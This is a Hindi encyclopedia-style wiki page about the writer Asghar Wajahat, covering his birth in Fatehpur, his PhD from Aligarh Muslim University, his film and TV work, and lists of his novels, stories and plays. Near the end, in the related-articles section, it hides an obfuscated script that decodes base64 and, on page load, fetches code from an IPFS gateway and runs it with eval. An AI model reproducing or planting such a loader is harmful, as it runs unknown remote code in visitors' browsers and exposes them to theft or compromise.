असग़र वजाहत

भारत डिस्कवरी प्रस्तुति
Revision as of 05:24, 5 July 2018 by रविन्द्र प्रसाद (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
असग़र वजाहत
पूरा नाम सैयद असग़र वजाहत
जन्म 5 जुलाई 1946
जन्म भूमि फ़तेहपुर, उत्तर प्रदेश
कर्म भूमि भारत
मुख्य रचनाएँ 'जिन लाहौर नईं वेख्या वो जन्‍म्‍या ई नईं', 'इन्ना की आवाज' (नाटक), 'गरजत बरसत' (उपन्यास) आदि।
भाषा हिंदी
विद्यालय अलीगढ़ मुस्लिम विश्वविद्यालय
शिक्षा पी. एच. डी.
पुरस्कार-उपाधि कथा क्रम सम्मान, इंदु शर्मा कथा सम्मान
प्रसिद्धि नाटककार, उपन्यासकार, पटकथा लेखक, प्राध्यापक
नागरिकता भारतीय
अन्य जानकारी ये टेलीविज़न व फ़िल्म लेखन और निर्देशन से भी जुड़े रहे हैं। कई वृत्ताचित्रों, धारावाहिकों और कुछ फीचर फ़िल्मों के लिए पटकथा लेखन भी इन्होंने किया है।
अद्यतन‎
इन्हें भी देखें कवि सूची, साहित्यकार सूची

असग़र वजाहत (अंग्रेज़ी: Asghar Wajahat, जन्म: 5 जुलाई, 1946) हिन्दी के प्राध्यापक तथा रचनाकार हैं। इन्होंने नाटक, कथा, उपन्यास, यात्रा-वृत्तांत तथा अनुवाद के क्षेत्र में अनेक रचनाएँ की हैं। ये दिल्ली में स्थित जामिला मिलिया इस्लामिया के हिन्दी विभाग के अध्यक्ष रह चुके है।

संक्षिप्त परिचय

असग़र वजाहत का जन्म 5 जुलाई, 1946 को फ़तेहपुर, उत्तर प्रदेश में हुआ था। इन्होंने अलीगढ़ मुस्लिम विश्वविद्यालय से पी. एच. डी. तक की पढ़ाई की। इनके लेखन कार्य में तीन कहानी संग्रह, चार उपन्यास, छ: नाटक और कई अन्य रचनाएँ शामिल हैं। उनके छह नाटकों का देश भर में मंचन और प्रदर्शन हुआ है। 'जिन लाहौर नईं वेख्या, ते जन्म्या नईं' ने देश की सरहद के बाहर भी खूब तारीफें बटोरी हैं। बुदापैस्त, हंगरी में इनकी दो एकल चित्र प्रदर्शनियाँ भी हो चुकी हैं। ये टेलीविज़न व फ़िल्म लेखन और निर्देशन से भी जुड़े रहे हैं। कई वृत्ताचित्रों, धारावाहिकों और कुछ फीचर फ़िल्मों के लिए पटकथा लेखन भी इन्होंने किया है।

प्रमुख कृतियाँ

असग़र वजाहत की प्रमुख कृतियाँ[1]
उपन्यास
  • सात आसमान
  • गरजत बरसत
  • कैसी आगी लगाई
  • बरखा रचाई
  • रात में जागने वाले
  • पहर-दोपहर
  • मन माटी
कहानी
  • मैं हिंदू हूँ
  • दिल्ली पहुँचना है
  • स्विमिंग पूल
  • सब कहाँ कुछ
आलोचना
  • हिंदी-उर्दू की प्रगतिशील कविता
नाटक
  • जिन लाहौर नईं वेख्या वो जन्‍म्‍या ई नईं
  • फिरंगी लौट आए
  • इन्ना की आवाज
  • वीरगति
  • समिधा
  • अकी
  • सबसे सस्ता गोश्त


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. असग़र वजाहत (हिंदी) (एच.टी.एम.एल) हिंदी समय डॉट कॉम। अभिगमन तिथि: 21 जनवरी, 2013।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः